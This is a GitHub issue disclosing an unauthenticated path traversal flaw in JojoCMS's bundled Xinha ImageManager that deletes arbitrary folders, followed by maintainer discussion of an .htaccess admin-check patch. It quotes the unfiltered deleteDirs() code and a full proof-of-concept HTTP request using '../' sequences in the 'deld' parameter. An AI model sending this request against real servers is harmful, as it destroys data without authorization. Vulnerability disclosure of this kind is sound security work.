New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
a path travel vuln in jojocms #30
Comments
|
Cool. Thanks. Will patch it. Xinha is third-party code that is no longer being updated so will patch the local copy |
|
Although to get to that path you would have to have Jojo installed inside your web root folder which is not in any way recommended, for exactly this reason (and probably a whole bunch of others), which is the main reason it was designed to run from outside root. |
|
I'm thinking that a requirement to have admin permissions on the xinha would cover it. |
|
Okay I've added an .htaccess file that prepends a file to every file and requires the $isadmin variable to be set so that even if you do have it in the webroot you have to call it through jojo (so that $isadmin is set) and be logged in as admin. Please test and let us know if this fixes all your concerns. |
|
nice. |
|
well, unauthorized user can not use the imagemanger and extendefilemanger with the patch |
there is a path travel vuln that can delect any folder on the server, and it can be done by an unauthorized remote attacker
Code
./plugins/jojo_core/external/xinhan/plugins/ImageManager/Classes/ImageManager.php
line 602~608
function deleteDirs() { if(isset($_GET['deld'])) return $this->_delDir(rawurldecode($_GET['deld'])); else Return false; }the para $_GET['deld'] shoule be filted
Poc
GET /plugins/jojo_core/external/xinha/plugins/imageManager/backend.php?__plugin=ImageManager&__function=images&dir=/&deld=/../../../../../../../../001/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/plugins/jojo_core/external/xinha/plugins/imageManager/backend.php?__plugin=ImageManager&__function=images
Cookie:
Connection: close
Upgrade-Insecure-Requests: 1
before the post


after the post
Chen ruiqi
Codesafe Team
The text was updated successfully, but these errors were encountered: